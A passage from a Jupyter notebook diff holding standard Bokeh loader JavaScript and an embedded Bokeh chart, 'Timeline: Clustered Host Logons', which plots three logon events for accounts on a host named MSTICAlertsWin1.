handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!output.data.hasOwnProperty(EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"2195\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error() {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (var i = 0; i < css_urls.length; i++) {\n      var url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\": \"JayppSWSRBsibIZqI8S4vAb1oFgLL0uhNvSn8cmArlOvYOwfFjYeyY5UWwJ+K0SU\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\": \"G0/Tv/Yy/zEPNsnW0Qif/FOsGesd+KIrKg/QLmvQmReuUW9qmSP7mAmr0VpiUNr3\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\": \"VLYHEbLQDk5G1+/4ALU0myoJPMEUsngWry2fzYorFOUmarjGRPLLURaeK/on6JqX\"};\n\n    for (var i = 0; i < js_urls.length; i++) {\n      var url = js_urls[i];\n      var element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error;\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.2.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.2.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"2195\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"a10d0eb2-328d-4e25-bdb1-f3046ff46df5\" data-root-id=\"2292\"></div>\n"
+      ]
+     },
+     "metadata": {}
+    },
+    {
+     "output_type": "display_data",
+     "data": {
+      "application/vnd.bokehjs_exec.v0+json": "",
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"550e64a0-fc0d-47c6-abe3-96f0640dbaff\":{\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"2200\"},{\"id\":\"2232\"}]},\"id\":\"2292\",\"type\":\"Column\"},{\"attributes\":{\"text\":\"Timeline: Clustered Host Logons\"},\"id\":\"2201\",\"type\":\"Title\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2324\",\"type\":\"DaysTicker\"},{\"attributes\":{\"axis\":{\"id\":\"2211\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"2214\",\"type\":\"Grid\"},{\"attributes\":{\"below\":[{\"id\":\"2211\"}],\"center\":[{\"id\":\"2214\"},{\"id\":\"2218\"}],\"left\":[{\"id\":\"2215\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"2276\"},{\"id\":\"2282\"},{\"id\":\"2288\"}],\"right\":[{\"id\":\"2291\"}],\"title\":{\"id\":\"2201\"},\"toolbar\":{\"id\":\"2225\"},\"x_range\":{\"id\":\"2203\"},\"x_scale\":{\"id\":\"2207\"},\"y_range\":{\"id\":\"2205\"},\"y_scale\":{\"id\":\"2209\"}},\"id\":\"2200\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"2306\"},{\"id\":\"2307\"},{\"id\":\"2308\"},{\"id\":\"2309\"},{\"id\":\"2310\"},{\"id\":\"2311\"},{\"id\":\"2312\"},{\"id\":\"2313\"},{\"id\":\"2314\"},{\"id\":\"2315\"},{\"id\":\"2316\"},{\"id\":\"2317\"}]},\"id\":\"2212\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"2207\",\"type\":\"LinearScale\"},{\"attributes\":{\"below\":[{\"id\":\"2243\"},{\"id\":\"2248\"}],\"center\":[{\"id\":\"2246\"}],\"plot_height\":120,\"plot_width\":900,\"renderers\":[{\"id\":\"2254\"},{\"id\":\"2259\"},{\"id\":\"2264\"}],\"title\":{\"id\":\"2233\"},\"toolbar\":{\"id\":\"2247\"},\"toolbar_location\":null,\"x_range\":{\"id\":\"2235\"},\"x_scale\":{\"id\":\"2239\"},\"y_range\":{\"id\":\"2237\"},\"y_scale\":{\"id\":\"2241\"}},\"id\":\"2232\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"align\":\"right\",\"text\":\"Drag the middle or edges of the selection box to change the range in the main chart\",\"text_font_size\":{\"value\":\"10px\"}},\"id\":\"2248\",\"type\":\"Title\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"2233\",\"type\":\"Title\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"],[\"LogonType\",\"@LogonType\"],[\"Account\",\"@Account\"]]},\"id\":\"2199\",\"type\":\"HoverTool\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\adm1nistrator\"},\"renderers\":[{\"id\":\"2282\"}]},\"id\":\"2284\",\"type\":\"LegendItem\"},{\"attributes\":{\"fill_alpha\":0.2,\"fill_color\":\"navy\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[2,2],\"line_width\":0.5},\"id\":\"2267\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"data_source\":{\"id\":\"2197\"},\"glyph\":{\"id\":\"2257\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2258\"},\"selection_glyph\":null,\"view\":{\"id\":\"2260\"}},\"id\":\"2259\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2326\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"2313\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2327\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2223\",\"type\":\"PanTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2263\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2312\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2221\",\"type\":\"ResetTool\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2316\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2320\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2315\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"2219\",\"type\":\"WheelZoomTool\"},{\"attributes\":{\"data_source\":{\"id\":\"2198\"},\"glyph\":{\"id\":\"2262\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2263\"},\"selection_glyph\":null,\"view\":{\"id\":\"2265\"}},\"id\":\"2264\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2329\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"end\":1547530582165.3,\"start\":1547515272537.7002},\"id\":\"2203\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2222\",\"type\":\"SaveTool\"},{\"attributes\":{\"data\":{\"Account\":[\"NT AUTHORITY\\\\SYSTEM\"],\"LogonType\":[5],\"TimeGenerated\":{\"__ndarray__\":\"AEBPyfKEdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[1],\"y_index\":[2]},\"selected\":{\"id\":\"2304\"},\"selection_policy\":{\"id\":\"2305\"}},\"id\":\"2198\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"axis\":{\"id\":\"2215\"},\"dimension\":1,\"grid_line_color\":null,\"ticker\":null},\"id\":\"2218\",\"type\":\"Grid\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2274\",\"type\":\"Diamond\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2323\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"2198\"}},\"id\":\"2265\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2237\",\"type\":\"DataRange1d\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2271\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\adm1nistrator\"],\"LogonType\":[3],\"TimeGenerated\":{\"__ndarray__\":\"ALAP9P6EdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[2],\"y_index\":[1]},\"selected\":{\"id\":\"2302\"},\"selection_policy\":{\"id\":\"2303\"}},\"id\":\"2197\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2309\",\"type\":\"DaysTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2287\",\"type\":\"Diamond\"},{\"attributes\":{\"source\":{\"id\":\"2196\"}},\"id\":\"2255\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"2224\"}},\"id\":\"2220\",\"type\":\"BoxZoomTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2262\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"2328\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2253\",\"type\":\"Circle\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2258\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"2198\"},\"glyph\":{\"id\":\"2286\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2287\"},\"selection_glyph\":null,\"view\":{\"id\":\"2289\"}},\"id\":\"2288\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data_source\":{\"id\":\"2196\"},\"glyph\":{\"id\":\"2252\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2253\"},\"selection_glyph\":null,\"view\":{\"id\":\"2255\"}},\"id\":\"2254\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"2197\"}},\"id\":\"2260\",\"type\":\"CDSView\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"top_units\":\"screen\"},\"id\":\"2224\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#FDE724\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2286\",\"type\":\"Diamond\"},{\"attributes\":{\"source\":{\"id\":\"2198\"}},\"id\":\"2289\",\"type\":\"CDSView\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"2199\"},{\"id\":\"2219\"},{\"id\":\"2220\"},{\"id\":\"2221\"},{\"id\":\"2222\"},{\"id\":\"2223\"}]},\"id\":\"2225\",\"type\":\"Toolbar\"},{\"attributes\":{\"fill_color\":{\"value\":\"#208F8C\"},\"line_color\":{\"value\":\"#208F8C\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2257\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2325\",\"type\":\"DaysTicker\"},{\"attributes\":{\"source\":{\"id\":\"2196\"}},\"id\":\"2277\",\"type\":\"CDSView\"},{\"attributes\":{\"overlay\":{\"id\":\"2267\"},\"x_range\":{\"id\":\"2203\"},\"y_range\":null},\"id\":\"2266\",\"type\":\"RangeTool\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"2310\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2297\",\"type\":\"BasicTickFormatter\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2322\",\"type\":\"DaysTicker\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"2290\"},{\"id\":\"2284\"},{\"id\":\"2278\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"2291\",\"type\":\"Legend\"},{\"attributes\":{},\"id\":\"2301\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"end\":1547531220066.45,\"start\":1547514634636.5498},\"id\":\"2235\",\"type\":\"Range1d\"},{\"attributes\":{\"label\":{\"value\":\"NT AUTHORITY\\\\SYSTEM\"},\"renderers\":[{\"id\":\"2288\"}]},\"id\":\"2290\",\"type\":\"LegendItem\"},{\"attributes\":{},\"id\":\"2302\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#208F8C\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2281\",\"type\":\"Diamond\"},{\"attributes\":{},\"id\":\"2304\",\"type\":\"Selection\"},{\"attributes\":{\"fill_color\":{\"value\":\"#440154\"},\"line_color\":{\"value\":\"#440154\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2252\",\"type\":\"Circle\"},{\"attributes\":{\"days\":[\"%m-%d %H:%M\"],\"hours\":[\"%H:%M:%S\"],\"milliseconds\":[\"%H:%M:%S.%3N\"],\"minutes\":[\"%H:%M:%S\"],\"seconds\":[\"%H:%M:%S\"]},\"id\":\"2249\",\"type\":\"DatetimeTickFormatter\"},{\"attributes\":{\"data_source\":{\"id\":\"2197\"},\"glyph\":{\"id\":\"2280\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2281\"},\"selection_glyph\":null,\"view\":{\"id\":\"2283\"}},\"id\":\"2282\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"data\":{\"Account\":[\"MSTICAlertsWin1\\\\MSTICAdmin\"],\"LogonType\":[4],\"TimeGenerated\":{\"__ndarray__\":\"ACAcSvyEdkI=\",\"dtype\":\"float64\",\"order\":\"little\",\"shape\":[1]},\"index\":[0],\"y_index\":[0]},\"selected\":{\"id\":\"2300\"},\"selection_policy\":{\"id\":\"2301\"}},\"id\":\"2196\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2306\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2249\"},\"ticker\":{\"id\":\"2244\"}},\"id\":\"2243\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"2330\",\"type\":\"YearsTicker\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"2271\"},\"ticker\":{\"id\":\"2212\"}},\"id\":\"2211\",\"type\":\"DatetimeAxis\"},{\"attributes\":{},\"id\":\"2300\",\"type\":\"Selection\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2311\",\"type\":\"DaysTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2319\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2275\",\"type\":\"Diamond\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.5},\"fill_color\":{\"value\":\"#208F8C\"},\"line_alpha\":{\"value\":0.5},\"line_color\":{\"value\":\"#208F8C\"},\"size\":{\"units\":\"screen\",\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"2280\",\"type\":\"Diamond\"},{\"attributes\":{},\"id\":\"2303\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2321\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"source\":{\"id\":\"2197\"}},\"id\":\"2283\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"2317\",\"type\":\"YearsTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2297\"},\"major_label_overrides\":{\"0\":\"MSTICAlertsWin1\\\\MSTICAdmin\",\"1\":\"MSTICAlertsWin1\\\\adm1nistrator\",\"2\":\"NT AUTHORITY\\\\SYSTEM\"},\"ticker\":{\"id\":\"2216\"}},\"id\":\"2215\",\"type\":\"LinearAxis\"},{\"attributes\":{\"axis\":{\"id\":\"2243\"},\"ticker\":null},\"id\":\"2246\",\"type\":\"Grid\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2307\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"2314\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"label\":{\"value\":\"MSTICAlertsWin1\\\\MSTICAdmin\"},\"renderers\":[{\"id\":\"2276\"}]},\"id\":\"2278\",\"type\":\"LegendItem\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2319\"},{\"id\":\"2320\"},{\"id\":\"2321\"},{\"id\":\"2322\"},{\"id\":\"2323\"},{\"id\":\"2324\"},{\"id\":\"2325\"},{\"id\":\"2326\"},{\"id\":\"2327\"},{\"id\":\"2328\"},{\"id\":\"2329\"},{\"id\":\"2330\"}]},\"id\":\"2244\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"2241\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2216\",\"type\":\"BasicTicker\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":{\"id\":\"2266\"},\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"2266\"}]},\"id\":\"2247\",\"type\":\"Toolbar\"},{\"attributes\":{\"end\":2.3333333333333335,\"start\":-0.3333333333333333},\"id\":\"2205\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"2239\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"2305\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"data_source\":{\"id\":\"2196\"},\"glyph\":{\"id\":\"2274\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"2275\"},\"selection_glyph\":null,\"view\":{\"id\":\"2277\"}},\"id\":\"2276\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2308\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2209\",\"type\":\"LinearScale\"}],\"root_ids\":[\"2292\"]},\"title\":\"Bokeh Application\",\"version\":\"2.2.2\"}};\n  var render_items = [{\"docid\":\"550e64a0-fc0d-47c6-abe3-96f0640dbaff\",\"root_ids\":[\"2292\"],\"roots\":{\"2292\":\"a10d0eb2-328d-4e25-bdb1-f3046ff46df5\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        clearInterval(timer);\n        embed_document(root);\n      } else {\n        attempts++;\n        if (attempts > 100) {\n          